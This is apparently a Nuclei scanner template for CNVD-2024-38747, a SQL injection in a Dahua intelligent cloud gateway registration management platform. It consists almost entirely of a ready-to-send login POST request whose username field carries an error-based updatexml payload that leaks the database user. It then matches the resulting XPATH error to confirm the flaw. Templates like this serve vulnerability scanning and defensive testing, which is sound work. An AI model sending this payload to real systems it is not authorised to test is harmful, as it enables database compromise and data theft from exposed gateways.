id: CNVD-2024-38747

info:
  name: 大华智能云网关注册管理平台 - SQL Injection
  author: qwtd
  severity: high
  description: 大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747)，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
  reference:
    - https://wiki.wy876.cn/#/./%E5%A4%A7%E5%8D%8E/%E5%A4%A7%E5%8D%8E%E6%99%BA%E8%83%BD%E4%BA%91%E7%BD%91%E5%85%B3%E6%B3%A8%E5%86%8C%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CNVD-2024-38747)
  tags: 大华-智能云网关注册管理平台

http:
  - raw:
      - |
        POST /index.php/User/doLogin HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        X-Requested-With: XMLHttpRequest
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=1')and+updatexml(1,concat(0x7e,user(),0x7e),1)--+&password=

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "XPATH syntax error"

      - type: status
        status:
          - 200